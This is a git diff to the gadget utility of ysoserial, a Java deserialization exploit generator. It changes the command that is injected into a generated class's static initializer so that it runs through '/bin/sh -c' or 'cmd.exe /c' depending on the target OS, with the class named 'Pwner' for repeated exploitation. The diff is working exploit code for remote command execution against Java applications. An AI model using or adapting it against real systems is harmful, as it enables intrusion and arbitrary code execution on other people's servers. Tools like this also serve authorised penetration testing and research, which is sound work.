diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/src/main/java/ysoserial/payloads/util/Gadgets.java
index 9792beb1..f8cb86e1 100644
--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -12,11 +12,6 @@
 import java.util.HashMap;
 import java.util.Map;
 
-import com.nqzero.permit.Permit;
-import javassist.ClassClassPath;
-import javassist.ClassPool;
-import javassist.CtClass;
-
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
@@ -25,6 +20,10 @@
 import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+
 
 /*
  * utility generator functions for common jdk-only gadgets
@@ -114,9 +113,24 @@ public static <T> T createTemplatesImpl ( final String command, Class<T> tplClas
         final CtClass clazz = pool.get(StubTransletPayload.class.getName());
         // run command in static initializer
         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
-        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
-            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
-            "\");";
+        
+        String cmd = "	String executor = \"/bin/sh\";\n" + 
+        		"		String param = \"-c\";\n" + 
+        		"	    if (System.getProperty(\"os.name\").toLowerCase().contains(\"win\")) {\n" + 
+        		"	    	executor = \"cmd.exe\";\n" + 
+        		"	    	param = \"/c\";\n" + 
+        		"	    }\n" + 
+        		"	    \n" + 
+        		"		try {\n" + 
+        		"			String[] args = new String[3];\n" +
+        		"			args[0] = executor;\n" +
+        		"			args[1] = param;\n" +
+        		"			args[2] = \"" + command.replaceAll("\"", "\\\\\\\"") + "\";\n" +
+        		"			java.lang.Runtime.getRuntime().exec(args);\n" + 
+        		"		} catch(Exception e) {\n" + 
+        		"			e.printStackTrace();\n" + 
+        		"		}";
+        
         clazz.makeClassInitializer().insertAfter(cmd);
         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
         clazz.setName("ysoserial.Pwner" + System.nanoTime());